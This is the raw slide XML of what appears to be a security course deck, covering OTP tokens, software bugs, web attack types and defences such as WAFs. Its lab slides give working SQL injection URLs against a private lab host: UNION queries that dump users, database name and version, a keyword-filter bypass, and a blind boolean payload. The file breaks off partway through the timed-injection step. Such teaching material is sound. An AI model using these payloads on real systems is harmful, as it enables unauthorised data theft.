              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Synchronous Dynamic Password Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Generates passwords at fixed time intervals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Require synchronizing the clock on the authentication server with the clock on the token device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The subject enters the generated password into the system along with a PIN, passphrase, or password. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486595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Time Synchronous One Time Password Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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09600" y="1524000"/>
            <a:ext cx="8058150" cy="4972050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333190445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Drawbacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the battery dies or the device is broken, the subject is unable to gain access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Token devices can get lost or stolen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Tokens must be stored and managed intelligently because if a token system is compromised, it can be difficult and expensive to replace. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Human factors can render tokens less secure than they are designed to be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1787932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Types of Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="1752600"/>
            <a:ext cx="6324600" cy="4419600"/>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
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web penetration attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93312004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bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an error, flaw, failure, fault in a computer program that leads to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>wrong result or unexpected behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caused by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program source code, design, Framework, and operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some bugs arises from compilers that generates incorrect code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>passwords in plain text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uncontrolled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>data input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logic errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hard to detect in parallel programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Session handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4671756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attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timed SQL Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote execution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Script inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369662336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SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Discover the vulnerability in data validation that allows the attacker inserts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL statement into the input. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This insertion allow the attacker to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the form authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access to the server shell with root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in the applications that return table of data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104547702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SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Discover the vulnerability in data validation that allows the attacker inserts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. This insertion allow the attacker to :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the form authentication			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in the applications that return one result out of 2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9839567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SQL injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Timed SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	The same as Blind, but the application return nothing, or single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Used when enable a user to execute a command from a HTML form. Incorrect validation of data input, will allow attacker to execute a remote command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	How to inject a JavaScript into HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325258875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 to protect web apps.</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Application protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Creating a filter with strong data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>validation, Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a Framework that aware of web vulnerabilities (MS.NET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Laravel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Web application protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Install Web Application Firewall in the web server to intercept the user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardware Web Application Firewall:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Install Web Application Firewall to intercept the user input and protect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>servers from attacks, load balancers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> .. Such as WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38118499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1-SQL : Try to load a Course with ID 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2-SQL : Try with ID 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=3-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3-SQL: Combine with other tables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://192.168.67.128/compiler/sql/id.php?id=1+union+Select+*+from+users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4-SQL: To retrieve the DB name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1+union%20select+1,2,database()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206302230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5-SQL: To retrieve More</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://192.168.67.128/compiler/sql/id.php?id=1+union%20select%201,2,concat(user(),%22:%22,database(),%22:%22,version())</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6-SQL: Adding filter that replace select with space and try </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id1.php?id=1+union+select+*+from+users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id1.php?id=1+union+selselectect+*+from+users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>	http://192.168.67.128/compiler/sql/id1.php?id=1+union+Select+*+from+users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143732864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8-Blind SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.67.128/compiler/sql/sql2.php?id=1	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.67.128/compiler/sql/sql2.php?id=1+and+1=if(substring(database(),2,1)='t',1,0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9-Timed SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/sql3.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
